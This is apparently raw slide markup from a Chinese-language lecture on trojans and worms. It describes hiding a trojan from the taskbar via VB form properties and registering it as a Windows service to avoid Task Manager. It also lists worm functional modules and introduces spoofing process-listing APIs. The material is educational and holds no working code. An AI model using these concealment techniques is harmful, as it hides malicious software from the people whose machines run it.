                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这是最基本的隐藏方式。如果在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的任务栏里出现一个莫名其妙的图标，傻子都会明白是怎么回事。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实现任务栏中隐藏，在编程时是很容易实现的。以</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>VB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为例，只要把</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Visible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>属性设置为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>False </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>ShowInTaskBar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>设为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>False</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，程序就不会出现在任务栏里了。</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9" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）把木马程序注册为服务</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82950" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="522397" y="1551589"/>
            <a:ext cx="8220075" cy="4754617"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>进程列表中不显示木马进程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>9X/NT/2000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下，把木马服务端程序注册为一个服务就可以了，这样，程序就会从任务列表中消失了，因为系统不认为它是一个进程，在任务管理器中就看不到这个程序的进程。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>这种方法对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>WindowsNT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/2000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/2003</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>等操作系统来说，通过服务管理器，同样会发现在系统中注册过的服务。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82950">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82950">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82950">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82950">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82950">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82950">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82950">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82950">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82950">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82950">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82950">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8295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50"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731BE94-2C0B-4736-9253-A030AC7A6511}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>典型计算机蠕虫基于功能模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>搜索模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>传输</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>负载</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="zh-CN" dirty="0"/>
              <a:t>模块</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>控制模块</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="标题 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{635B0C6A-6166-4BD7-B2E6-38A7148EBAAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>计算机蠕虫</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150357733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3" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>）欺骗查看进程的函数</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="506413" y="1271588"/>
            <a:ext cx="8229600" cy="3886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ts val="4000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="folHlink"/>
              </a:buClr>
              <a:buSzPct val="60000"/>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buChar char="n"/>
              <a:tabLst/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Windows</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>系统中，一般是通过</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>调用来查看运行的进程，常用的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>包括</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PSAPI </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>PDH</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" err="1">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>ToolHelp</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t> API</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>等。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2592388" y="3286125"/>
            <a:ext cx="3095625" cy="792163"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FF6600"/>
              </a:gs>
            </a:gsLst>
            <a:path path="shape">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>进程查看软件</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2592388" y="5373688"/>
            <a:ext cx="3095625" cy="792162"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FF6600"/>
              </a:gs>
            </a:gsLst>
            <a:path path="shape">
              <a:fillToRect l="50000" t="50000" r="50000" b="50000"/>
            </a:path>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="FFFF00"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>API</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="AutoShape 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3240088" y="4078288"/>
            <a:ext cx="288925" cy="1296987"/>
          </a:xfrm>
          <a:prstGeom prst="downArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 112225"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="bg1"/>
              </a:gs>
              <a:gs pos="100000">
                <a:srgbClr val="FF6600"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="18900000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4895850" y="4076700"/>
            <a:ext cx="288925" cy="1296988"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 112225"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF6600"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="18900000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2376488" y="4484688"/>
            <a:ext cx="936625" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>调用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5156200" y="4484688"/>
            <a:ext cx="1439863" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
